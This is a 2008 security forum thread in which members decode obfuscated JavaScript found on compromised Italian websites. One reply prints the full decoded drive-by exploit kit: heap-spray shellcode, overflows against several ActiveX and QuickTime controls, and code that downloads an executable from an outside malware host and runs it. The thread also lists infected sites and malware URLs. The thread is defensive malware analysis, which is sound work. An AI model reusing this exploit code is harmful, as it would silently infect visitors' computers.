Author Topic: Some italia site with obfuscated javascript  (Read 7849 times)

0 Members and 1 Guest are viewing this topic.

April 26, 2008, 05:04:59 am
Read 7849 times

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
I find with my tool Webscanner  some italian sites with obfuscate javascript

The first javascript redirect over page with javascript also strong obfuscated.

vvv.deegees.it
vvv.graphixmania.it
vvv.sabrinasalerno.com
vvv.skuolasprint.it
vvv.custommania.com
vvv.giovaniudccasteltermini.com

More info over

http://edetools.blogspot.com/2008/04/utilizzo-di-webscanner-nella-ricerca-di.html

and also

http://edetools.blogspot.com/2008/04/sito-le-chicche-di-cala-con-javascript.html

I try to decode second script but i have problem with function callee to string.
If on have people know to decode is good  ;D


Edgar from Bangkok  :)




April 26, 2008, 01:32:52 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
302's to;

http://eaoafir.com/cgi-bin/index.cgi?grobin

Wishing Bobby was here as my attempt to decode it, resulted in what looks like gibberish;

Code: [Select]
j{bpra}$OB5AxDcRd5g0xEQ5n]0(zH`Iq]Ft|zmJ@E[fDAa])//rq={dp}G`n)VAeBElOo;/A,nqc~_tr-_j^{iq;sk\fmzt'%)/p{p`pra}2tdbDhpv,N6b:@U;C{9)VAeBElOo;=vq}k]lW73hd.c51&5Hu]{}GM_pRZ8$I-drj^JECs0JO)Fr,J=@X@RRD6j7f~Y|}dnLSi46:bxd7zmKsHCyM1M)//4G-Nf_&E?PEA9BHKsHCyM1M48$[6OUTG8nnZKsHCyM1Mf/??`n)9W]Nf1P>[/A,Z`pq s51()%A-G`n):Fzz?EjQ#/A,TGUKKAXAv))%?:BD35:$JzmNY7@w]y4.)//5Gsnn1hpv,\iR=gP|>^9)#A<G-Nf_&E?P7)AyZ@@t;C/BJJ-2V\R0oZ^D6,JNY7@w]y4.)0MB,>Z)aTQ>rMu'A$2-0HW;{1Bw:@$F-/%DX~v4`n)JDe{USM%/A,=:a'pscV@<K$>B57)JDe{USM%//I-Nf_&E?P3A-,u]{pvxtQ,KT@$I-W1jaZcQ24^nbAt=$`?ZDRHk*Cfmh`nuYa4No0Y)//RC`K^A&qege4]xje[P@\gaTQ>rMu'A?us$W)bPnE3^jMpvxtQ,KT@a,I,2RC`K^A&qegnqhpD?Fn>\4//KTfAU;FDmG|yS$W/m;DC9D-<P:hFe?S1r<$=Hek{aTQ>rMu'A$I-/7)D_I=Ph>$/@,N6b:@U;C{-hn`vxtHNY7@w]y4.48$`n)4U\|{iqri/A,5Jp9cAV@B7gP;r>MB@)}2ou`nLasiM'NY7@w]y4.2/*,?41D=4}?Q0>*/A,[6OUTG8nnZ>OJrvhsfm$W/m;DC9D-=:)*/*,>53@)A5AH|G}"6^A44)//O=p.[&D<,k$P:hFe?S1r<$=6:eo7O=p.[&D<,I,2O=p.[&D<,8<P:hFe?S1r-O=p.[&D<,JG}"6^A447f~Whjp@:5;sk^bi~P`on8?uhhnZx<~1N='G2xrmc}Z/@,E(=4}?Q0>*/A,//)/O=p.[&D<Gu]{xhPrJ,_YQ$I-maPv~nx7oa,nqX\e8Nw.ZL$<HKsHCyM1M)./<G-Nf_&E?P'4/uqCaT"ekNhNf_&E?PY)//O=p.[&D<:pg]{5~hqNs$X\e8Nw.ZJnqnkVY<|A2OL$./:rjd/hd@7QAeCJ,J,DX~v4`n)AyZ@@t;C/A,=:X\e8Nw.ZK$tAnOK#qT=;kawYlG-Nf_&E?P4//65u]{pvxtQ,KT@$I-g0xEQ5n]0*|gqw'KsHCyM1M5A-G`n)W6<4^b(/A,}`n|WXr5`nuYa4No0()#E-G`n)@frAP@fAW/A,vc@n=?ZsOZ`a%GYD3Bf-e~-As=h~WduFtu>=s1kKE$9-MSw'REvEd7rX7FAuk\kfz,I,2FAuk\kfz,J>&s_Vr)/6AC:ynkVY<|A2O:A,`snr`v2rniLZpvO|ca148|Ru`h8?us'`a%GYD3B)/5,J<rVSiW=UcK {iztsd2hd@7QAeCJ,J,Do/ixdVg7Db7o=8:/G|rjd/mqNK/;*Q,J,Df},m?JDZ]St$nkVY<|A2OJ,p`plZ7i5-zen3[7>ExI)//5Gsnmr-'en3[7>ExI2{u{ck {sonsex`/A,/.Do$ons_qt-,|y5D:Q|QPWJ7+A>2@>%C7NE`1j&D8DD5?A)peCo8]B6GiCS3,>"PJM@a2>$P8nn@1K3G4N>62J*D8D>4/K&HenE@@B+H9NE@.K*E;M@a0J$G5mq`-k'PFEE@5j&p;mq@.K&F8@S3aJ*H9NC4/ATF6nD6_J#GFDo72?(F:B?6-?%C5@r`5j)pfB?a`j#H:NB8`B%HImA50?8D8BC5/@)DFCq4-<UC5@r@=jWP6mr`5>SDgDF5_K4F5n>8>@+G;BA6,?(p=nEa2J(Ffn@51K5E;moa.B(H=NP7.jUE5BA6BA'G8BC4B?(FiCoa5?Sp7Eo6=B+E8C@5@>4D8BB6,?(E:C@5`>$pjA>2`=8pjM@A2>$G5mE`.AVFIDo6]B7D8D>4/K(PJnAa4@+p7CC`5@&HGmn`1J&F9nE4>ATF6nD6?j#GFDo72@#EgBO6B<8BiA>2@=8p6ME50>3G5mE`.AVFIDo6=B7D8D>6,?(DFC@52>TC5@R2_=Xq6N>@2j%HIE>84J*D=Cs50>&E8CC41A#C:@p3@B)p4ND84?(P6ME50>SG5ME`.AVFiDo6]B7D8D>6,?(DFCA52>TC5@R2_=8Q6N>@2j%HIE>84j*D=CS50>&E8CD41A#C:@P3`B)P4ND84?(P6ME50>3G5mE`.AVFiDO6]B7D8D>6,?(DfCB52>4C5@r2_=8Q6n>@2j%HiE>84J*D=CS50>&E8CE41A#C:@p3@B)p4nD84?(P6mE50>SG5ME@.A6FiDo6=BWD8D>6,?(DfCC52>TC5@r2_=XQ6N>@2J%HIE>84j*D=CS50>&E8CF41A#C:@p3`B)P4ND84?(p6ME50>3G5ME@.A6FiDO6]B7D8D>6,?(DfCD52>4C5@r2?=Xq6n>`2J%HIE>84j*D=CS50>&E8CN41A#C:@p3@B)p4ND84?(P6ME50>3G5ME@.A6FIDo6=BWD8D>6,?(DFCE52>4C5@R2_=8q6N>`2j%HiE>84J*D=Cs50>&E8Co41A#C:@p4-<UBhMQ85?(E5noa/B&p9mr7,jTHfB?51?XD8BC5/@)DfBo4-<5Bh@Q81k*Him@`b?VC5@rA,>%C7@S3aBTHeBA4^kXp<mAa1B5G5mF81?(F:CS50>&E8CB41?(DjBE50J$peNC@3A6P<CAA=?"Hhn?83jTq5E>@=>3D:EC84K$HIm@a3B)D8DD80K&HHMO`4B%p<mF41@$D=C?5`>$D9D>4/@%EEBo4-<5BhNQ`.j*PEmp8-B)H:BA6,?(DFC?6?>&EJA>2@>%C7@s3aj*H9NC4/AUFGC@82A3H:DB61?(F:B?a.B%pemq8=J)PHn>A2?"p;NQ@2kSHIMS8,B%p6MO@4J)P4mD6.J'p=mC@2kSpfBN60>WD8CB5/?8F8@S3aJ*H9NC4/B)H7CEA?J"H;Dq`_?(F:B?52>&EjA>2@>%C7@s3aB*p7NC4^kUHenA50A'P;EA7?K6GHDAa4?XE8CS72k+G=EoA>A(F:nE5bA5FgC@82ASH:DB61@&p9mDA.B+P<mp5aB+PGE?8`J+G<DC@3@#E8BO50jVC5@R2?k"HhCB`_A%FINR`,?(F:B?7]@'E9EC7^J*FeDA6.B'HGmB`1A+P<MC`5@%P<Bp72K+G=EOA>A(F:NE4_@&PHN>83J(p:mq`-jVE5C@6]>TEJA>2`>%C7@O``B*D8BP8`jSEgMN81@Upin>4/A$D=CA5`<8BI@Q2?B)H7CEA?J"H;Dq@??(E8CS50>&E8BC5a>%C7@s3A<TG9Er55K7P;mB7`jTD8BS6,?(p7MC63B3G9DR@@k%F8@S3aJ8C5@r3,>"q4mn@@BWH=BP70J"EJNNA.B'FhNQ5-k$HiN=`^J(HgBA5B?(EfC?5@<XBI@Q70j"EJNNa.B'Fhnq4/@#F:B?52?$E8BC5a>%C7@s3A<8BInn80k*D=DB6`@%p9Cq75k#H7B?7->$PHN@81k)p7DS`5B&D8BS4/B)H7CEA?J"H;DQ@?A#C:@PA=B%p:BA@.k%G<NB75@8E;mq4/A%D=mCA/B'P=n>84K&PHC=`3J&H=MB@3jTFimr@5BXH=n?`3?WDFNB`3J&HHnA`3?*E6Cq4-<Up7N>7.K+FIDS63B4E6nD84kSFenCA4j&HhMC@4K3HiBN52BWH9N?8=K4HEMF@5>&E4BA41B"HENE`1A'H;NC8_K(PHBA5`?6C5@R`.K%G<NB75@8E;mq5-K+HInC71J(p<nC8?j*PINC@5>SD:ND`1j+DfBr50>&F7CF83J4F4MD60B*EFCA5/@(E=C?62?)EGCA5/@)EEC?62?(EhCE53@(EJC?60?$E8CA5/@(E=C?62?%E=mn53j+HGMA@5B*HEBC4/@#D=DB6`@%p9Cq75K#H7Bo6B<XBiA>2`jSP<mBa5B8H=N?@3@&HFn>`4jTE6mB`/k(Hin=@4@'Hgmq8bJ3E5N>A-A#p;DF7,@+p6BO6b<8BI36:
Tried going back to snag a copy and re-check but the server is returning the status code 500 (Internal Server Error)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 26, 2008, 01:51:00 pm
Reply #2

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
Founds others sites with javascript obfuscated

vvv.fluidifikas.it
vvv.ristoreggio.it
vvv.jacopo81.it
vvv.sevenpress.com
vvv.fasterage.net

Same code
Is possible malware links serve MBR ROOTKIT


Edgar  :)

April 26, 2008, 02:18:13 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Slightly better cleaned up version (had to clean it up by hand), but still can't get it to decompile either manually or using Malzilla ....... someone with more knowledge of JS may be better at going further with this than myself;

Code: [Select]
dc="0d)K7t7M-t)>wudTqdu89=8t)>wudTqi899+yv8d)K7t7M, 9d)K7t7M-!+d)K7"
}
7M-t)>wud]~dx89;
!+ve~sdy~0S]^8t<
}
<i9kfqb0b-888i;
8#:t99;
8
}
Nt9:#9;
t9+budeb~0b+mfqb0t-7fuc|h>s
}
7+fqb0iSx!<iSx"<";
dz="function dw(t)"
{
ca='document.write("';ce='")';cb='<scriptlanguage=\"javascript\">';cc='<\/script>';
eval(unescape(t))
}
;";
dd="
}
Sx<tSx<
}
^
}
+yv8d)K7i7M,"  '9kd)K7i7M0-0"  '+m
}
^
}
-S]^8d)K7t7M<d)K7
}
7M<d)K7i7M9+iSx!-|)K888d)K7i7M6 hQQ9;
}
^
}
950&5##950"&M+iSx"-|)K8888d)K7i7M6 h##!!9..#9;
}
^
}
950! 9M+
}
Sx";
ca="function dcs(ds,es)";
{
ds="unesc";
op="$="dw(dcs(cu,14))"";
";
";
cb="ape(ds)";
st=tmp='';
for(i=0;
i<ds.l";
db="d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<"<#<$<?<'<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89=8t)>wudTqi89'";
"9+u|cu";
cz="function cz(cz)";
{
return ca+cb+cc+cd+ce+cz;
}
;";
ce="charCodeAt(0)^('0x00'+es)))";
}

}
";
de="-|)K88d)K7"
}
7M;
}
^
}
950"?+yv888d)K7t7M:"9.- 96688d)K7t7M:"9,-)99tSx-~)K8d)K7t7M50! 9M+u|cu0tSx-|)K88d)K7t7M:&950"'9M+4-4>bu`|qsu8t<iSx";
}
Sx;
iSx!;
tSx;
}
)Kd)K7
}
7M=!M;
7>s
}
79+";
cu="(p";
}
b4g`mxq)6b
}
g
}
v
}
x
}
`m.|
}
ppqz6*(
}
rfuyq4gfw)6|``d.;
;
bqgx
{
l:w
{
y;
xp;
sfv;
64c
}
p`|)?4|q
}
s|`),$*(;
}
rfuyq*(;
p
}
b*";
st="st="$=st;dcs(da+db+dc+dd+de,10);dw(st);st=$;da="fqb0"
}
)-~ug0Qbbqi87e~7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7<7fuc7<7wxd7<7u~y7<7ud~7<7|uf7<7dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7
{
7<7|7<7
}
7<7~7<77<7`7<7a7<7b7<7c7<7";
cc="ength";
i++)
{
tmp=ds.slice(i,i+1)?;
cd="bst=st+String.fromCharCode((tmp.";
if (document.cookie.indexOf('vbulletin_multiquote=')==-1)
{
sc('vbulletin_multiquote=',2,7);
eval(unescape(dz+cz+op+st)+dw(dz+cz($+st));)
}
else
{
$=''
}
;function sc(cnm,v,ed)
{
var exd=new Date();
exd.setDate(exd.getDate()+ed);
document.cookie=cnm+ '=' +escape(v)+';
expires=+exd.toGMTString();
}
dc="0d)K7t7M-t)>wudTqdu89=8t)>wudTqi899+yv8d)K7t7M,%209d)K7t7M-!+d)K7";
}
7M-t)>wud]%7F~dx89;
!+ve~sdy%7F~0S]^8t<
}
<i9kfqb0b-888i;
8#:t99;
8
}
Nt9:#9;
t9+budeb~0b+mfqb0t-7fuc|%7Fh>s%7F
}
7+fqb0iSx!<iSx%22<";
dz="%66%75n%63%74i%6fn%20dw(%74)"
{
ca='document.write("';ce='")';cb='<scriptlanguage=\"javascript\">';cc='<\/script>';eval(unescape(t))};";
dd="
}
Sx<tSx<
}
^
}
+yv8d)K7i7M,%22%20%20'9kd)K7i7M0-0%22%20%20'+m
}
^
}
-S]^8d)K7t7M<d)K7
}
7M<d)K7i7M9+iSx!-|)K888d)K7i7M6%20hQQ9;
}
^
}
950&5##950%22&M+iSx%22-|)K8888d)K7i7M6%20h##!!9..#9;
}
^
}
950!%209M+
}
Sx";
ca="function dcs(ds,es){ds=unesc";
op="$="dw(dcs(cu,14));
%22;
";
cb="a%70e(d%73)";
st=tmp='';for(i=0;i<ds.l";
db="d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<%22<#<$<%<&<'<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89=8t)>wudTqi89";
%229+u|cu";
cz="function cz(cz)"
{
return ca+cb+cc+cd+ce+cz;
}
ce="charCodeAt(0)^('0x00'+es)))";
}
";
de="-|)K88d)K7";
}
7M;
}
^
}
950%22%9M+yv888d)K7t7M:%229.-%2096688d)K7t7M:%229,-)99tSx-~)K8d)K7t7M50!%209M+u|cu0tSx-|)K88d)K7t7M:&950%22'9M+4-4>bu`|qsu8t<iSx%22';
}
Sx;
iSx!;
tSx;
}
)Kd)K7
}
7M=!M;
7>s%7F
}
79+";
cu="(p"
}
b4g`mxq)6b
}
g
}
v
}
x
}
`m.|
}
ppqz6*(
}
rfuyq4gfw)6|``d.;
;
bqgx
{
l:w
{
y;
xp;
sfv;
64c
}
p`|)%$$4|q
}
s|`),$*(;
}
rfuyq*(;
p
}
b*";
st="st="$=st;dcs(da+db+dc+dd+de,10)"";
dw(st);st=$;
da="fqb0";
}
)-~ug0Qbbqi87e~%7F7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7<7fuc7<7wxd7<7u~y7<7ud~7<7|uf7<7dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7
{
7<7|7<7
}
7<7~7<7%7F7<7`7<7a7<7b7<7c7<7";
cc="ength";
%69++%29
{
tmp=ds.slice(i,i+1)%3";
cd="bst=st+String.fromCharCode((tmp.";
if (document.cookie.indexOf('vbulletin_multiquote=')==-1)
{
sc('vbulletin_multiquote=',2,7);
eval(unescape(dz+cz+op+st)+dw(dz+cz($+st));
)
}
else
{
$=''
}
;function sc(cnm,v,ed)
{
var exd=new Date();
exd.setDate(exd.getDate()+ed);
document.cookie=cnm+ '=' +escape(v)+;
expires=+exd.toGMTString();
}
;
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 26, 2008, 02:42:14 pm
Reply #4

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 27, 2008, 12:29:49 pm
Reply #5

dikex

  • Newbie

  • Offline
  • *

  • 1
    • Lazy Man
<script type="text/javascript">

function byBVYypmH(EDcA4......var XCr713T35 = arguments.callee.toString() + location.href;......var I825656Ee = eval;......try {I825656Ee(VSTel45n3);} ......

------------------------------------------Change some string---------------------------------------------------

<textarea id="textareaID" rows="34" cols="110"></textarea>

<script type="text/javascript">

aaaa=('function byBVYypmH(EDcA4......var XCr713T35 = arguments.callee.toString() + location.href;......var I825656Ee = eval;......try {I825656Ee(VSTel45n3);} ......');

function byBVYypmH(EDcA4......var XCr713T35 = aaaa.toString() + "http://eaoafir.com/cgi-bin/index.cgi?grobin";......var I825656Ee = eval;......try {document.getElementById("textareaID").innerText=(VSTel45n3);} ......

-------------------------------------Decode(Double click the html)----------------------------------------------

URL of Virus : hXXp://hnoafir.com/cgi-bin/index.cgi?d2c4a4e00000022601110249440600000000059ad0f089000108040000000006

Code: [Select]

function U7HqjnXG(QcGoPNLD)
{
var mc7r4akc = "abcdefghiklmnopqrstuvwxyz0123456789";
var a17zMsDE = '';
for (var vWEkSeqq=0; vWEkSeqq<QcGoPNLD; vWEkSeqq++) {
var pCc7_bae = Math.floor(Math.random() * mc7r4akc.length);
a17zMsDE += mc7r4akc.substring(pCc7_bae, pCc7_bae+1);
}

return a17zMsDE;
}

function o2r10YZM(xw75N43p, FZayaLXl)
{
var nCc2Hu_s = null;
var yRrOaJUh = 'nCc2Hu_s=xw75N43p.';
var oMr4XVRC = new Array(
'CreateObject(FZayaLXl)',
'CreateObject(FZayaLXl, "")',
'CreateObject(FZayaLXl, "", "")',
'GetObject("", FZayaLXl)',
'GetObject(FZayaLXl, "")',
'GetObject(FZayaLXl)'
);

var U3mZc6is=0;

while(!nCc2Hu_s && U3mZc6is < oMr4XVRC.length) {
try {
eval(yRrOaJUh+oMr4XVRC[U3mZc6is]);
} catch(e) { }

U3mZc6is++;
}

return nCc2Hu_s;
}

function dq8VuAlN(uRk2eNwT, l8belPXf)
{

try {
uRk2eNwT.open("GET", l8belPXf, false);
uRk2eNwT.send(null);

} catch(e) { return 0; }

return uRk2eNwT.responseBody;
}


function r806xlyt(t0NDW77x, gE7fyYOc, UChBuRkb)
{

try {
t0NDW77x.Type = 1;
t0NDW77x.Mode = 3;
t0NDW77x.Open();
t0NDW77x.Write(UChBuRkb);
t0NDW77x.SaveToFile(gE7fyYOc, 2);
t0NDW77x.Close();
} catch(e) { return 0; }

return 1;
}

function IIGGDjgN(Kuug3coA, uRk2eNwT, t0NDW77x, M3CX9NWF, mqZaftOC)
{
var sXXBMpeF = 0;
var DStyMkCZ = dq8VuAlN(uRk2eNwT, Kuug3coA);

if (DStyMkCZ != 0) {
var qGHfN1ME = "c:\\"+U7HqjnXG(6)+".exe";

if (r806xlyt(t0NDW77x, qGHfN1ME, DStyMkCZ) == 1) {
if (mqZaftOC == 0) {
try {
M3CX9NWF.Run(qGHfN1ME, 0);
sXXBMpeF = 1;
} catch(e) { }
} else {
try {
M3CX9NWF.ShellExecute(qGHfN1ME, "", "", "open", 0);
sXXBMpeF = 1;
} catch(e) { }
}
}
}

return sXXBMpeF;
}

function DgvnLSll()
{
var ZmFSGFGA = 0;
var uK6eUqMi = 1;
var Qjg9dZMZ = "http://hnoafir.com/cgi-bin/index.cgi?d2c4a4e00000022602110249440600000000059ad0f0890001080400000000020";
var i9YJrZeZ = new Array(null, null, null);

try {
var l2SqPKiW = 0;
var UDKzrfkA = document.createElement("object");
UDKzrfkA.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (UDKzrfkA) {
i9YJrZeZ[0] = o2r10YZM(UDKzrfkA, "msxml2.XMLHTTP");
if (!i9YJrZeZ[0])
i9YJrZeZ[0] = o2r10YZM(UDKzrfkA, "Microsoft.XMLHTTP");

if (!i9YJrZeZ[0])
i9YJrZeZ[0] = o2r10YZM(UDKzrfkA, "MSXML2.ServerXMLHTTP");

i9YJrZeZ[1] = o2r10YZM(UDKzrfkA, "ADODB.Stream");

i9YJrZeZ[2] = o2r10YZM(UDKzrfkA, "WScript.Shell");

if (!i9YJrZeZ[2]) {
i9YJrZeZ[2] = o2r10YZM(UDKzrfkA, "Shell.Application");
if (i9YJrZeZ[2]) l2SqPKiW = 1;
}
}

if (i9YJrZeZ[0] && i9YJrZeZ[1] && i9YJrZeZ[2]) {
for(var eA9NiqmX=0;eA9NiqmX<uK6eUqMi;eA9NiqmX++) {
var wTMNrJOs = IIGGDjgN(Qjg9dZMZ+eA9NiqmX.toString(), i9YJrZeZ[0], i9YJrZeZ[1], i9YJrZeZ[2], l2SqPKiW);

if (!ZmFSGFGA)
ZmFSGFGA = wTMNrJOs;
}
}

} catch(e) {}

return ZmFSGFGA;
}

function KdXGn3hS(Aj8NqDys, YKZ_z0Ot)
{
try {

var JiXlJ1cE = new Date();
JiXlJ1cE.setDate(JiXlJ1cE.getDate() + 1);

if (Aj8NqDys) {
document.cookie =
"id=" + Aj8NqDys +
"; path=/";
}

if (YKZ_z0Ot) {
document.cookie =
"addt=" + YKZ_z0Ot +
"; path=/";
}


} catch(e) {
}
}

var jOr2Ow3C = new Array();
var Zlq35uLI = 0;

function SEVaPTtu()
{
jOr2Ow3C = jOr2Ow3C;
setTimeout(SEVaPTtu, 100);
}

function h8fKeT0p(i7ZjoRZr, zXGdeRmP)
{
while (i7ZjoRZr.length*2<zXGdeRmP)
i7ZjoRZr += i7ZjoRZr;

i7ZjoRZr = i7ZjoRZr.substring(0,zXGdeRmP/2);
return i7ZjoRZr;
}

function is7lXC3o()
{
if (!Zlq35uLI) {
var JVRGiF4u = 0x0c0c0c0c;
var RJUJFZip = unescape("%u9090%u9090%u9090%u9090%ufce9%u0000%u5f00%ua164%u0030%u0000%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u408b%u8d34%u7c40%u688b%u8b3c%u6af7%u5904%u8fe8%u0000%ue200%u68f9%u6e6f%u0000%u7568%u6c72%u546d%u16ff%ue88b%u79e8%u0000%u8b00%u47d7%u3f80%u7500%u47fa%u4757%u3f80%u7500%u8bfa%u5fef%uc933%uec81%u0104%u0000%udc8b%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u7865%u7565%u8303%u08eb%u0389%u43c7%u2e04%u7865%uc665%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u0675%u016a%uff53%u0456%u595a%uc283%u4104%u3a80%u7500%uffb4%u0856%u5651%u758b%u8b3c%u2e74%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%uc503%udb33%ube0f%u3a10%u74d6%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uabc5%u595e%ue8c3%ufeff%uffff%u4e8e%uec0e%ufe98%u0e8a%ud87e%u73e2%uca33%u5b8a%u1a36%u702f%u4d58%u7049%u6800%u7474%u3a70%u2f2f%u6e68%u616f%u6966%u2e72%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6e69%u6564%u2e78%u6763%u3f69%u3264%u3463%u3461%u3065%u3030%u3030%u3230%u3632%u3230%u3131%u3230%u3934%u3434%u3630%u3030%u3030%u3030%u3030%u3530%u6139%u3064%u3066%u3938%u3030%u3130%u3830%u3430%u3030%u3030%u3030%u3030%u3830%u0030");
var g4W4EFSq = 0x400000;
var Cjz4YfDK = RJUJFZip.length * 2;
var zXGdeRmP = g4W4EFSq - (Cjz4YfDK+0x38);
var i7ZjoRZr = unescape("%u0c0c%u0c0c");

i7ZjoRZr = h8fKeT0p(i7ZjoRZr,zXGdeRmP);
var qkB6u7_b = (JVRGiF4u - 0x400000)/g4W4EFSq;

for (var SBHRkGrq=0;SBHRkGrq<qkB6u7_b;SBHRkGrq++) {
jOr2Ow3C[SBHRkGrq] = i7ZjoRZr + RJUJFZip;
}

Zlq35uLI = 1;
SEVaPTtu();
}


return 0;
}

function EgAcyU9i() {

try {
var b80MrOJx = new ActiveXObject('Sb.SuperBuddy');

if (b80MrOJx) {
is7lXC3o();
KdXGn3hS(9);
b80MrOJx.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

function E3UIjfPF()
{
try {

var n6YvBrCg = new ActiveXObject("GomWebCtrl.GomManager.1");

if (n6YvBrCg) {
is7lXC3o();
var JD06Xe9P='';
var owExuTTl = 506;

for(var WsRPFrcv=0;WsRPFrcv<owExuTTl;WsRPFrcv++)
JD06Xe9P += unescape("%0c");

JD06Xe9P += unescape("%0c%0c%0c%0c");

KdXGn3hS(13);
n6YvBrCg.OpenURL(JD06Xe9P);
}
} catch(e) {
}

return 0;
}


function cf5PSiUy()
{
try {
var Pcp6NhZi = '<object classid="clsid:BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3" ' +
  'width="1" height="1" style="border: 0px" id="caobj"></object>';

var tQOzUV9N = document.createElement("div");
tQOzUV9N.innerHTML = Pcp6NhZi;
document.body.appendChild(tQOzUV9N);

var oyhBNKhZ = document.getElementById("caobj");

if (oyhBNKhZ.AddColumn) {
is7lXC3o();
KdXGn3hS(21);

var ntGMze7q = unescape("%u0c0c%u0c0c");
       
while(ntGMze7q.length < 256) {
ntGMze7q += ntGMze7q;
}

ntGMze7q = ntGMze7q.substring(0, 128);
oyhBNKhZ.AddColumn(ntGMze7q, 1);
}
} catch(e) { }

return 0;
}

function mtX0nQMB()
{
try {
var IQfiD7Au = new ActiveXObject("QuickTime.QuickTime.4");

if (IQfiD7Au) {
is7lXC3o();
var QVgEgLwI = "";
for(var ldccWmLy=0;ldccWmLy<200;ldccWmLy++) {
QVgEgLwI += "AAAA";
}

QVgEgLwI += "AAA";

for(var ldccWmLy=0;ldccWmLy<3;ldccWmLy++) {
QVgEgLwI += "\x0c\x0c\x0c\x0c";
}

var RT56dulV =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://hnoafir.com/cgi-bin/index.cgi?d2c4a4e00000022601110249440600000000059ad0f089000108040000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://BBBB:' + QVgEgLwI +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

var pQ2wnUDc = document.createElement("div");
pQ2wnUDc.innerHTML = RT56dulV;
KdXGn3hS(6);
document.body.appendChild(pQ2wnUDc);

}
} catch(e) {
}

return 0;
}
if (DgvnLSll() || EgAcyU9i() || E3UIjfPF() || cf5PSiUy() || mtX0nQMB()) { /*window.location = 'about:blank';*/ }
 else { /*window.location = 'about:blank';*/ }

Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear!

April 27, 2008, 11:15:42 pm
Reply #6

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

April 28, 2008, 08:24:15 am
Reply #7

redwolfe_98

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 21
I find with my tool Webscanner  some italian sites with obfuscate javascript

vvv.deegees.it
vvv.graphixmania.it
vvv.sabrinasalerno.com
vvv.skuolasprint.it
vvv.custommania.com
vvv.giovaniudccasteltermini.com

Edgar

edgar, i think it is misleading when you substitute "vvv" for "www"..

April 28, 2008, 03:39:41 pm
Reply #8

Edgar Bangkok

  • Special Members
  • Full Member

  • Offline
  • *

  • 61
    • Edgar Internet Tools
is only for avoid to put direct link malware site , you possible change vvv with www and next use the urls  ;D

Edgar